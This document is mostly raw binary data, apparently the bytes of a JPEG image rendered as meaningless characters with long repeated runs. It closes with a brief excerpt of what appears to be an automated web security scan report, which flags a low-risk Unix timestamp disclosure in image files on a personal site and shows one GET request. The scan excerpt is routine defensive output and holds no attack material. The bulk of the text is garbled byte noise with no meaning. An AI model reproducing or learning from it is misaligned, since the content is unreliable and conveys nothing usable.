          ɺihީݱö©c"œç%Ðïj5•d­pDÕÒ(å!ÉC{ÞþòßڝíwnS·µg­Õ‘ð˜yé㧦ŽÑêPôE}‰‰güýUüŸö?ñä“çÒn®Ùê½Ú˜èbÈI&75Vrš$–ze”êzj¨£´.à1Œº2·(ËvÔ̑¬ƒ<zµ+O³¢}/ÄMú•†8÷Óz\U<ùxê<wúµÄȂR?²&+þÕí'Ó¿¨§^Òz3]UÒø.®†j˜ê1¸«¡Öff…`X©õ+µ:˜<¦–™¤@ÎK»ÊÊ	 Uu#¯Nª…ûz_þ+îÍÓ£‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qê2M5<ñTSË$Á"Mð»E43Dáã–)«Ç$n «"ãÛnR¨=\yõ·òþoPöšm¯‹ß)·pv|iO…êîØÍU,pöBF
          
          £¼«§*‘v@#¢®‘´ç,"”Œ†–¯‚ùç‘M‘›yÙ¢ÿã$CýՐªþ#³áK44« Ç[û‰úM×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷A?y̨Þö¯¦ÿݕ³ÞZÿ’îÝþœÿÇOH÷÷°„uVÞæ¾‚}{ߺ÷^÷î½×½û¯uÿ×Ù_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢Yó»ân;å¿Hä6…1£¡ì=±4ۗ¬³•vŽ*]Ã;EQ„¯¨U2E„ÜôƒíªºÅ(† «šuB3änk“”÷¨îÚ­·Ê4L£Í+†øäzKQ¨ž“ÜÀ'Œ¯ã?ÕóëLÛµ÷ÉÜy­£»põûsm̕^9„ÉÀÔÕøÜ•¦šZ˜[èñȼJ²Ù”• œÆ¶º·½·†îÒe’ÚE¬¦ ‚0GDD%XPŽ’’ÄÿÅ}»Õ‡öuO©ÿ[þ#Û~_Ó¨r}ØÅ}Ðð=_¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¢kxÝ$Ú9#pèèÅ]Hete!••…ÁƒîÀðêã‰ëm?åüàcì¶þ-|®ÜÑÿPR`z›·³•B8÷Ði±Û+}djBoki‹’‘€ÌqçïôI]óÇ"ý/¼ì°ÿ‹|RD?« þâ_ÃÄváRM*è1æ:ÙgÜKÒN½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è'ï/ù•ÏþÕôßû²¡ö{Ë_ò]ۿӟøééáþáÏöðŽªÛÜ×ÐO¯{÷^ëÞý׺÷¿uî¿ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{£{ñ2¦š›!½ÍMDáèðALòÇb'Ê\)‘–ä_ñìÏHïÛ¡	î~¾KÑÖÌ@ióä?ËÑÕþ+ŒÿþvSÿ×Ïqρ?ûåÿaèö£×¯ÆÎƃÿ;)ÿëç¿xÿ¾_ö½Që׿Šã?çcAÿ”ÿõóß¼	ÿß/û^¨õ뱔Æa‘¡$ð«§¹?õ3ß¼	¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          192261204
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        40. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          193438474, which evaluates to: 1976-02-17 21:54:34

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
